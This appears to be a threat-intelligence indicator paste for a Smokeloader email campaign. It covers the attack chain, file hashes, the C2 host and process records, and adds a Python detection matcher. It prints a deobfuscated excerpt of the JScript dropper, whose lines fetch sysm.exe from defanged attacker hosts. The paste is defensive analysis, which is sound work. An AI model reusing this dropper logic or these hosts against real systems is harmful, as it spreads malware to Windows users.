#smokeloader_081118

VRad Nov 9th, 2018 (edited)
#IOC #OptiData #VR #smokeloader #WSH #LZH

https://pastebin.com/JmthzrL4
previous contact:
https://pastebin.com/1scwT0f8
https://pastebin.com/MP3kCSSh
FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/

attack_vector
--------------
email attach (lzh) > js > WSH (wscript.exe) > HTTP GET > %AppData%\Microsoft\Windows\Templates\<random digits>.exe

email_headers
--------------
n/a

files
--------------
SHA-256 59e8acea6e292c7e2efde125dc8d4ddeb7c9e91ceff578866c6b725a41145c9d
File name   Рахунки ТОВ Техник.lzh  (Ukrainian: "Invoices LLC Tekhnik.lzh")
File size   26.37 KB

SHA-256 d54718754d68db8acc82a091b1eb098bb35dfdf0a3cc7c8227030a2787d2ff46
File name   11_2018p.xlsx
File size   12.28 KB

SHA-256 fb9cfe3f02d645f1127c0d9133954a107afd4c99e09295800b85053be5c88c10
File name   pax. 00-128 corp. TEXHIK.xls.js  (double extension: JScript posing as .xls)
File size   13.99 KB

SHA-256 0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21
File name   sysm.exe    (PE executable; DOS stub "!This program cannot be run in DOS mode.")
File size   518.5 KB

activity
**************

deobfuscated_script
dropper_script (excerpt as published; URLs defanged, download/write/execute tail not included):
var wsh = new ActiveXObject("wscript.shell");
// drop path: %AppData%\Microsoft\Windows\Templates\<4-7 digit integer in [9999, 1009998]>.exe
var path = wsh.SpecialFolders("templates") + "\\" + ((Math.random() * 999999) + 9999 | 0) + ".exe";
try {
    var HTTP = new ActiveXObject("MSXML2.XMLHTTP");
    var sh = new ActiveXObject("shell.application");
    HTTP.Open("GET", "h11p:\ districoperav{.} icu/neifo/sysm.exe", false);
    // ...
else  // fallback branch; its condition is not part of the published excerpt
    HTTP.Open("GET", "h11p:\ varanasiclick{.} ru/neifo/sysm.exe", false);

netwrk
--------------
wscript.exe 2872    79.133.98.58    80  ESTABLISHED

comp
--------------
79.133.98.58    districoperav{.} icu    GET /neifo/sysm.exe HTTP/1.1    Mozilla/4.0

C2  h11p:\ aviatorssm{.} bit/

proc
--------------
"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax. 00-128 corp. TEXHIK.xls.js"
"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\120598.exe"

persist
--------------
n/a (detects vm, sleeps)

drop
--------------
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\120598.exe

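Hunting example (added here, not part of the original paste or the author's tooling): the indicators above turned into a small matcher that runs over normalized endpoint/proxy events. It refangs the `{.}`-style hosts as published, derives the drop-path pattern from the dropper's `SpecialFolders("templates") + random + ".exe"` logic (4 to 7 decimal digits), and flags the wscript.exe-launching-a-.js stage. The event field names (`image`, `cmdline`, `sha256`, `dst_ip`, `host`, `uri`) and the sample events are constructed for illustration; map them to whatever your telemetry (Sysmon, EDR, proxy logs) actually emits.

```python
import re

# Indicators transcribed from the IOC list above (hosts kept in the published defanged form).
SHA256_IOCS = {
    "59e8acea6e292c7e2efde125dc8d4ddeb7c9e91ceff578866c6b725a41145c9d": "Рахунки ТОВ Техник.lzh",
    "d54718754d68db8acc82a091b1eb098bb35dfdf0a3cc7c8227030a2787d2ff46": "11_2018p.xlsx",
    "fb9cfe3f02d645f1127c0d9133954a107afd4c99e09295800b85053be5c88c10": "pax. 00-128 corp. TEXHIK.xls.js",
    "0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21": "sysm.exe",
}
DEFANGED_HOSTS = ["districoperav{.} icu", "varanasiclick{.} ru", "aviatorssm{.} bit"]
C2_IPS = {"79.133.98.58"}
PAYLOAD_URIS = {"/neifo/sysm.exe"}


def refang(host: str) -> str:
    """'districoperav{.} icu' -> 'districoperav.icu' (undo the paste's defanging)."""
    return re.sub(r"\{\.\}\s*", ".", host).strip().lower()


HOSTS = {refang(h) for h in DEFANGED_HOSTS}

# Dropper: SpecialFolders("templates") + "\\" + ((Math.random()*999999)+9999|0) + ".exe"
# -> an integer in [9999, 1009998], i.e. 4-7 digits, under ...\Roaming\Microsoft\Windows\Templates.
TEMPLATES_EXE = re.compile(
    r"\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\d{4,7}\.exe$", re.IGNORECASE
)


def path_matches_dropper(path: str) -> bool:
    return bool(TEMPLATES_EXE.search(path.strip('"')))


def check_event(event: dict) -> list:
    """Return the list of indicator hits for one normalized event (empty list = clean)."""
    hits = []
    sha = event.get("sha256", "").lower()
    if sha in SHA256_IOCS:
        hits.append("hash:" + SHA256_IOCS[sha])
    if event.get("dst_ip") in C2_IPS:
        hits.append("ip:" + event["dst_ip"])
    host = event.get("host", "").lower()
    if host in HOSTS:
        hits.append("host:" + host)
    if event.get("uri") in PAYLOAD_URIS:
        hits.append("uri:" + event["uri"])
    image = event.get("image", "")
    if path_matches_dropper(image):
        hits.append("path:templates-random-exe")
    # WSH stage: wscript.exe started with a .js argument (here a .xls.js double extension).
    cmdline = event.get("cmdline", "").lower()
    if image.lower().endswith("wscript.exe") and re.search(r'\.js"?\s*$', cmdline):
        hits.append("proc:wscript-js")
    return hits


def scan(events: list) -> dict:
    """Map event index -> hits, for events that matched at least one indicator."""
    results = {}
    for i, event in enumerate(events):
        hits = check_event(event)
        if hits:
            results[i] = hits
    return results


# Constructed sample events modelled on the proc/netwrk/drop sections above, plus two benign ones.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax. 00-128 corp. TEXHIK.xls.js"'},
    {"type": "network", "image": r"C:\Windows\System32\wscript.exe", "dst_ip": "79.133.98.58",
     "dst_port": 80, "host": "districoperav.icu", "uri": "/neifo/sysm.exe"},
    {"type": "process", "image": r"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\120598.exe",
     "sha256": "0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe", "sha256": "ab" * 32},
    {"type": "network", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "93.184.216.34", "host": "example.com", "uri": "/"},
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["type"], hits)
```

The path regex is the most durable of these: hashes and hosts rotate per campaign, but any 4-7 digit `.exe` written under the roaming Templates folder is unusual on a normal workstation and is worth an alert on its own.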
# # #
lzh https://www.virustotal.com/#/file/59e8acea6e292c7e2efde125dc8d4ddeb7c9e91ceff578866c6b725a41145c9d/details
xlsx    https://www.virustotal.com/#/file/d54718754d68db8acc82a091b1eb098bb35dfdf0a3cc7c8227030a2787d2ff46/details
js  https://www.virustotal.com/#/file/fb9cfe3f02d645f1127c0d9133954a107afd4c99e09295800b85053be5c88c10/details
url1    https://www.virustotal.com/#/url/d1aef86fefbdd3fa733f4ea8068e038ef5c39e112f50a7ccaedbc1bb2ffcf03a/details
url2    https://www.virustotal.com/#/url/b5758fb74969c0c998286e5bb2c0242e507a1e6037a3785b03edf2174bca878e/detection
exe https://www.virustotal.com/#/file/0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21/details
    https://analyze.intezer.com/#/analyses/08a7d313-03dd-4d6f-9f67-b662f083a559